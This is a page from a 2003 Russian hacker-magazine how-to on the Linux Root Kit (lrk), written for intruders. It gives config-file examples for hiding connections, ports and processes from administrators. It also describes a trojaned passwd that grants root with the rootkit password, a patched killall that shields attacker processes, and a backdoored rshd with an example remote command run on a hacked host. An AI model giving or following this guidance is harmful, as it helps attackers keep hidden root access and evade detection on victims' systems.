Издательский дом ООО "Гейм Лэнд"СПЕЦВЫПУСК ЖУРНАЛА ХАКЕР #32, ИЮЛЬ 2003 г.

LINUX ROOT KIT - HOWTO

[ElviS] (elvis@sgroup.ru)

Спецвыпуск Xakep, номер #032, стр. 032-036-3


тип 3: прячет локальный порт

тип 4: прячет удаленный порт

тип 5: прячет порты

Примерное содержание файла ROOTKIT_ADDRESS_FILE вот такое (пояснений, естественно, в самом файле нет):

0 1337 - прячет все соединения пользователя с юидом 1337.

1 194.84 - прячет все локальные соединения с ip 194.84.XXX.XXX.

2 194.84.8.1 - прячет все удаленные соединения на ip 194.84.8.1.

3 3355 - прячет локальные соединения с портом 3355.

4. 6667 - прячет все удаленные соединения на порт 6667 (ircd).

5 .ircd - прячет все ircd сокеты на хакнутой тачке.

passwd - эта программа (сервис) в протрояненном виде даст тебе права рута. Для этого нужно всего лишь знать пароль на руткит, который у тебя задан в rootkit.h. Когда программа попросит тебя ввести свой старый пользовательский пароль, забей вместо него пароль на lrk -> Wellcome root ;).

ХРЕН ТЫ НАС ЗАМОЧИШЬ!

Пропатченный killall не позволит убить процессы, перечисленные в текстовике, который указывается в параметре ROOTKIT_PROCESS_FILE в rootkit.h с помощью команды killall. Стоит заметить, что эти файлы не в силах убить даже суперюзер aka root. Есть два типа параметров, которые можно заносить в ROOTKIT_PROCESS_FILE (по умолчанию это /dev/ptyp). Первый тип - это точное название процесса, которое должно полностью соответствовать процессу, kill которого нельзя допустить. Например, в ROOTKIT_PROCESS_FILE ты можешь указать процесс lamprocess. Если рут сделает killall lamprocess, то процесс не кильнется, если же в процессах есть lamprocess2, то по команде killall lamprocess2 он успешно свернется.

Второй тип - это шаблон. Если такое сочетание символов встречается в названии одного или нескольких процессов, то с помощью killall его (их) тоже убить нельзя. К примеру, если ты указал шаблон hack, то процессы hack. Superhack, yhackx и т.д. убить killall'ом не получится. Но не забывай, что регистр символов имеет значение.

ps - аналогично killall и pidoff использует ROOTKIT_PROCESS_FILE. Скрывает процессы, терминалы, процессы с определенным именем, процессы определенного пользователя и т.д. Вот примерное содержание файла ROOTKIT_PROCESS_FILE:

0 0 - прячет все процессы пользователя с uid'ом 0, то есть рута (uid можешь поставить любой).

1 tty2 - скрывает терминал tty2.

2 hackprog - скрывает все процессы с названием hackprog.

3 hack - скрывает все процессы, в которых содержится слово hack, например, hacksoft, thehackd, hackdaemon (регистр имеет значение).

Еще раз повторюсь, не оставляй комментариев в файлах ROOTKIT_XXX_FILE, я пишу их тебе просто для разъяснения. И не оставляй пробелов после названий файлов и процессов. Текстовики, прописанные ROOTKIT_XXX_FILE, должны выглядеть так:

0 vata1

1 vata2

2 vata3

Где vataX, нужный файл, процесс, папка, порт, терминал и т.д.

РУЛИМ!

rshd - позволяет выполнять удаленные команды через rshd. Для этого надо знать пароль на руткит. Использование:

rsh -l rootkitpassword host command.

Пример:

rsh -l cerber wehackedthis.com /home/xakep/ircd/ircd -p 6667

Это запустит ircd на 6667 порту, если он существует в указанной директории.

Назад на стр. 032-036-2  Содержание  Вперед на стр. 032-036-4